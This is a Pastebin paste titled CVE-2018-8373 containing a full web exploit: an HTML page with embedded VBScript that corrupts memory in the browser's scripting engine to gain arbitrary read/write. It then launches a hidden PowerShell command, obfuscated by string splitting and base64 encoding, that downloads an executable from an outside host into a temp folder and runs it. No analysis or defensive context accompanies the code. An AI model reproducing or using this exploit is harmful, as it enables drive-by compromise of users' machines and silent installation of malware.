hollerith

CVE-2018-8373

Sep 30th, 2018
358
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!doctype html>
  2. <html lang="en">
  3. <head>
  4. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  5. <meta http-equiv="x-ua-compatible" content="IE=10">
  6. <meta http-equiv="Expires" content="0">
  7. <meta http-equiv="Pragma" content="no-cache">
  8. <meta http-equiv="Cache-control" content="no-cache">
  9. <meta http-equiv="Cache" content="no-cache">
  10. </head>
  11. <body>
  12. <script type="text/vbscript">
  13.  
  14. Dim max_col
  15. Dim index_vul
  16. Dim index_a
  17. Dim index_b
  18. Dim addr
  19. Dim array()
  20. Dim array2(0,6)
  21. Dim util_mem
  22. Dim fake_array
  23. Dim fake_str
  24.  
  25. Class Dummy
  26. End Class
  27.  
  28. Class ClassA
  29. private Sub Class_Initialize
  30. ReDim array(2)
  31. 'IsEmpty(array)
  32. End Sub
  33.  
  34. Public Default Property Get P
  35. ReDim Preserve array(100000)
  36.  
  37. For i = 0 To UBound(array2,2)
  38. array2(0,i) = 3
  39. Next
  40. For i = 0 To UBound(array)
  41. array(i) = array2
  42. Next
  43. P=&h0fffffff
  44. End Property
  45. End Class
  46.  
  47. Function rw_primit()
  48. array(index_vul)(index_a+2,0)=fake_array
  49. array(index_b)(0,2)=CDbl("1.740885"+"34731"+"324E-310")
  50.  
  51. array(index_vul)(index_a,0)=fake_str
  52. array(index_b)(0,0)=CDbl("6.365"+"98737437"+"801E-314")
  53.  
  54. util_mem=array(index_vul)(index_a,0)
  55. End Function
  56.  
  57. Function read
  58. read=LenB(array(index_vul)(index_a+2,0)(util_mem+8))
  59. End Function
  60.  
  61. Function GetUnlt32(addr)
  62. Dim value
  63. array(index_vul)(index_a+2,0)(util_mem+8)=addr +4
  64. array(index_vul)(index_a+2,0)(util_mem)=8
  65. value=read()
  66. array(index_vul)(index_a+2,0)(util_mem)=3
  67. GetUnlt32 = value
  68. End Function
  69.  
  70. Set cls = New ClassA
  71. array(2)=cls
  72.  
  73. IsEmpty(array)
  74.  
  75. max_col=&h0fffffff
  76.  
  77.  
  78. For i=0 To UBound(array)
  79. If UBound(array(i),1)-LBound(array(i),1)+1=max_col Then
  80. index_vul=i
  81. Exit For
  82. End If
  83. Next
  84.  
  85.  
  86.  
  87. For i=0 To UBound(array(index_vul),1)
  88. Dim type1 ,type2 ,type3 ,type4
  89. type1=VarType(array(index_vul)(i,0))
  90. type2=VarType(array(index_vul)(i+1,0))
  91. type3=VarType(array(index_vul)(i+3,0))
  92. type4=VarType(array(index_vul)(i+4,0))
  93. If(type1 = 2 And type2 = 2 And type3 = 3 And type4 = 3) Then
  94. index_a=i+3
  95. array(index_vul)(index_a,0)="AAAA"
  96. Exit For
  97. End If
  98. Next
  99.  
  100. For i=0 To UBound(array,1)
  101. If array(i)(0,0)=8 Then
  102. index_b=i
  103. Exit For
  104. End If
  105. next
  106.  
  107.  
  108.  
  109. Set dm = New Dummy
  110. Set array(index_vul)(index_a+4,0) = dm
  111. array(index_b)(0,4) = CDbl("6.3659"+"87374378"+"01E-314") '3
  112. addr=array(index_vul)(index_a+4,0)
  113.  
  114.  
  115. fake_array=Unescape("%u0001%u0"+"880%u000"+"1%u0000%u0"+"000%u0000%u000"+"0%u0000%uffff%u"+"7fff%u00"+"00%u0000")
  116. fake_str=Unescape("%u0000"+"%u0000%u"+"0000%u0000%u"+"0000%u0000"+"%u0000%"+"u0000")
  117. rw_primit()
  118.  
  119.  
  120. Dim psection
  121. psection = GetUnlt32(addr+&hc)
  122. dim a
  123. a=psection+4
  124.  
  125. Dim p_C0leScript
  126. p_C0leScript=GetUnlt32(a)
  127. a=p_C0leScript+&h174
  128. array(index_vul)(index_a+2,0)(a-8)=0
  129. Set Object = CreateObject("Sh"+"ell.Appl"+"ication")
  130. Object.ShellExecute "powe"+"rshel"+"l.ex"+"e -Window"+"Style Hi"+"dden -encod"+"edCo"+"mmand ""KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AeQBzAHcAYwBkAC4AYwBvAG0ALwB2AG8AbAAvAHMAMQAuAGUAeABlACcALAAgACcAYwA6AC8AdwBpAG4AZABvAHcAcwAvAHQAZQBtAHAALwBhAHQAdQBtADIAbAAuAGUAeABlACcAKQA7AGMAOgAvAHcAaQBuAGQAbwB3AHMALwB0AGUAbQBwAC8AYQB0AHUAbQAyAGwALgBlAHgAZQA="""
  131.  
  132. </script>
  133. </body>
  134. </html>
Add Comment
Please, Sign In to add comment